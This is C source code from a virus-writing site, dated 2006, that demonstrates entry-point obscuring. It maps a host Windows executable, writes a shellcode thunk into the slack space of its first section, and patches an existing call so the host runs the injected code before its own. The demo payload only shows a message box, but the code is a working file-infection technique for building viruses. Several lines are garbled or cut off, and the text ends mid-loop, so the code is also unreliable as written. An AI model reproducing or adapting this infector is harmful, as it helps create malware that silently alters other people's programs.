_ _ (_) | | __ ____ __ _ _ _ _ __ ___ _ __ _ __ ___ | |_ \ \ / /\ \/ /| || | | || '_ ` _ \ | '_ \ | '_ \ / _ \| __| \ V / > < | || |_| || | | | | || |_) |_ | | | || __/| |_ \_/ /_/\_\| | \__,_||_| |_| |_|| .__/(_)|_| |_| \___| \__| _/ | | | |__/ |_| /---------------------------------------------------------------------------------------\ |>...................[ 用C实现简单EPO技术 ]................<| |>......................[ by robinh00d/vxjump.net ]...................<| |>......................[ 2006-10-24 ]......................<| \>...................... [ robinh00d@sina.com ] ......................ASCII "robinh00d",0 */ #include #pragma comment(lib,"kernel32.lib") #pragma comment(lib,"user32.lib") char szHostFile[] = ".\\hello.exe" ; PIMAGE_DOS_HEADER pImageDosHeader ; PIMAGE_NT_HEADERS pImageNtHeaders ; PIMAGE_SECTION_HEADER pImageSectionHeader ; unsigned char thunkcode[] = "\x60\x9c\xe8\x00\x00\x00\x00\x5b" "\x81\xeb\x0d\x10\x40\x00\x6a\x00" "\x8d\x83\x30\x10\x40\x00\x50\x50" "\x6a\x00\xb8\x78\x56\x34\x12\xff" "\xd0\x9d\x61\xff\x25\x3a\x10\x40" "\x00\x90\x72\x6f\x62\x69\x6e\x68" "\x30\x30\x64\x00" ; int main() { HANDLE hFile ; HANDLE hMap ; LPVOID pMapping ; DWORD dwGapSize ; unsigned char *pGapEntry ; int i ; PROC MsgBox ; DWORD OldEntry ; int x = 0x18 ; int vir_len ; unsigned char *pSearch ; DWORD *dwCallNextAddr ; DWORD *dwCallDataOffset ; DWORD *dwCallDataAddr ; DWORD dwCallData ; DWORD dwCodeDistance ; DWORD *dwJmpAddr ; DWORD dwJmpData ; DWORD dwJmpVA ; //::: hFile = CreateFile(szHostFile, FILE_ALL_ACCESS, FILE_SHARE_READ, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL) ; if (hFile==-1) { printf("Open host file failed!\n") ; return -1 ; } hMap = CreateFileMapping(hFile, NULL, PAGE_READWRITE, 0, 0, NULL) ; if (!hMap) { printf("Create file mapping falied!\n") ; return -1 ; } pMapping = MapViewOfFile(hMap, FILE_MAP_ALL_ACCESS, 0, 0, 0) ; if (!pMapping) { printf("Map view of file failed!\n") ; return -1 ; } //Point to end of the section pImageDosHeader = (PIMAGE_DOS_HEADER)pMapping ; if (pImageDosHeader->e_magic==IMAGE_DOS_SIGNATURE) { pImageNtHeaders = (PIMAGE_NT_HEADERS)((DWORD)pMapping+pImageDosHeader->e_lfanew) ; if (pImageNtHeaders->Signature==IMAGE_NT_SIGNATURE) { //:::PE file //::: pImageSectionHeader = (PIMAGE_SECTION_HEADER)((DWORD)pMapping+ pImageDosHeader->e_lfanew+ sizeof(IMAGE_NT_HEADERS)) ; dwGapSize = pImageSectionHeader->SizeOfRawData - pImageSectionHeader->Misc.VirtualSize ; if (sizeof(thunkcode)>dwGapSize) { printf("no more space to fill!\n") ; goto Close ; } pGapEntry = (unsigned char *)(pImageSectionHeader->PointerToRawData+ (DWORD)pMapping+ pImageSectionHeader->Misc.VirtualSize) ; OldEntry = pImageNtHeaders->OptionalHeader.ImageBase+ pImageNtHeaders->OptionalHeader.AddressOfEntryPoint ; MsgBox = (PROC)GetProcAddress(LoadLibrary("user32.dll"),"MessageBoxA") ; for (i=3;i>=0;i--) { thunkcode[i+27] = ((unsigned int)MsgBox>>x)&0xff ; x -= 8 ; } x = 24 ; vir_len = (int)pImageSectionHeader->Misc.VirtualSize ; pSearch = (unsigned char *)(pImageSectionHeader->PointerToRawData+ (DWORD)pMapping) ; for (i=0;iPointerToRawData)+ pImageNtHeaders->OptionalHeader.ImageBase+ pImageNtHeaders->OptionalHeader.AddressOfEntryPoint ; dwJmpData = *((DWORD *)((unsigned char *)dwJmpAddr+2)) ; if ((*dwJmpAddr&0xffff)==0x25ff) { dwCodeDistance = (DWORD)pGapEntry - (DWORD)dwCallNextAddr ; *dwCallDataAddr = dwCodeDistance ; for (i=3;i>=0;i--) { thunkcode[i+37] = ((unsigned int)dwJmpData>>x)&0xff ; x -= 8 ; } for (i=0;i